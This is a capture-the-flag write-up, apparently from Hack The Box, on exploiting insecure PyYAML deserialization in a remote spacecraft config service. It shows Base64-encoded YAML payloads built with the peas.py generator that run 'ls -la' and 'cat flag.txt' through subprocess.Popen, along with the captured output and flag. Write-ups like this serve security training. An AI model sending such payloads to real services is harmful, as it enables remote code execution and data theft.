3 minutes to read
We are given a remote instance to connect to:
$ nc 31614
[1] Create config
[2] Load config
[3] Exit
Basic reconnaissance
We have two options. Using the first one, we can set some configuration and the output is a Base64-encoded string:
$ nc 31251
[1] Create config
[2] Load config
[3] Exit
> 1
- Creating new config -
Temperature units (F/C/K): C
Propulsion Components Target Temperature : 13
Solar Array Target Temperature : 37
Infrared Spectrometers Target Temperature : 0
Auto Calibration (ON/OFF) : ON
Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo=
Uploading to ship...
If we decode this string, we will see that it is a serialized object:
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',
propulsion_temp: '13', solar_array_temp: '37', units: C}
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d | xxd
00000000: 2121 7079 7468 6f6e 2f6f 626a 6563 743a !!python/object:
00000010: 5f5f 6d61 696e 5f5f 2e43 6f6e 6669 6720 __main__.Config
00000020: 7b49 525f 7370 6563 7472 6f6d 6574 6572 {IR_spectrometer
00000030: 5f74 656d 703a 2027 3027 2c20 6175 746f _temp: '0', auto
00000040: 5f63 616c 6962 7261 7469 6f6e 3a20 274f _calibration: 'O
00000050: 4e27 2c0a 2020 7072 6f70 756c 7369 6f6e N',. propulsion
00000060: 5f74 656d 703a 2027 3133 272c 2073 6f6c _temp: '13', sol
00000070: 6172 5f61 7272 6179 5f74 656d 703a 2027 ar_array_temp: '
00000080: 3337 272c 2075 6e69 7473 3a20 437d 0a 37', units: C}.
Moreover, if we search a bit we will identify the type of serialization is YAML.
Deserialization attack
PyYAML is known to be insecure if it deserializes untrusted data, which might be option 2
There is a public project called python-deserialization-attack-payload-generator that allows us to generate payloads to exploit insecure deserialization vulnerabilities in Python (more information in HackTricks):
$ cd python-deserialization-attack-payload-generator
$ python3 peas.py
Enter RCE command :ls -la
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :./payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
Let’s try it:
$ nc 31251
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=
** Success **
Uploading to ship...
[1] Create config
[2] Load config
[3] Exit
> total 20
drwxr-sr-x 1 ctf ctf 4096 Mar 10 20:10 .
drwxr-xr-x 1 root root 4096 Mar 10 20:10 ..
-rw-rw-r-- 1 root root 1583 Mar 10 20:08 chall.py
-rw-rw-r-- 1 root root 49 Mar 10 20:08 flag.txt
-rwxrwxr-x 1 root root 1583 Mar 10 20:08 hijack.py
Let’s now read the flag:
$ python3 peas.py
Enter RCE command :cat flag.txt
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
$ nc 31251
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=
** Success **
Uploading to ship...
[1] Create config
[2] Load config
[3] Exit
> HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}